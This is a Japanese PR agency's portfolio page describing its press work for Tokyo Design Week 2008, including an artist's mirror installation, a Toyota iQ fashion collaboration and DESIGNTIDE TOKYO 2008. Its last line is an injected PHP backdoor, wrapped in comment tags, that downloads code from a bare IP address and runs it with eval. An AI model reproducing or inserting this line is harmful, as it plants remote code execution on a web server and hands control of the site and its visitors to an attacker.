デイリープレス

Tokyo Design Week 2008

毎年秋に東京で開催されるデザインイベント
その中心となるDESIGNTIDE TOKYOの他、2つのイベントのPRを担当。

Koichiro Kimura 「elegance for future」

アーティストの木村 浩一郎が、女性の二面性をコンセプトに、アートと機能の融合したミラーシステム「mille le mirror」を発表。「やわらかさ」と相反する金属で造形されたドレープの台座と、リモートコントロールで上下に動く三面鏡は、鏡の前に立つ人の全身を映し出すことができる。『リステア ミッドタウン』を会場にラグジュアリーなインスタレーション展示を行った。
国内外向けのPRを担当。
Photo:Nobuo Yano

IQ × SOMARTA MICROCOSMOS

廣川玉枝氏が手掛けるファッションブランド「SOMARTA」とトヨタによるマイクロプレミアムカー「IQ」がコラボレートしたアートエキシビジョン「IQ × SOMARTA MICROCOSMOS」を明治神宮外苑内にある聖徳記念絵画館前広場の特設テントで開催。
国内外向けのPRを担当。

DESIGNTIDE TOKYO 2008

2008年より、メイン会場を東京ミッドタウンホールに移しリニューアル。多くの注目を集め、メイン会場への来場者数は3万人を超えた。
会場構成は、建築家 谷尻誠氏が担当。半透明の不織布を使用した、「構造を持たない建築」をテーマとした会場は、国内外で多くの反響を呼んだ。
オフィシャルプレスを担当した他、ディレクターとしても参加し、企画、運営にも携わる。

/*c137*/ eval(@file_get_contents('http://37.1.207.55/get.php')); /*cc137*/ ?>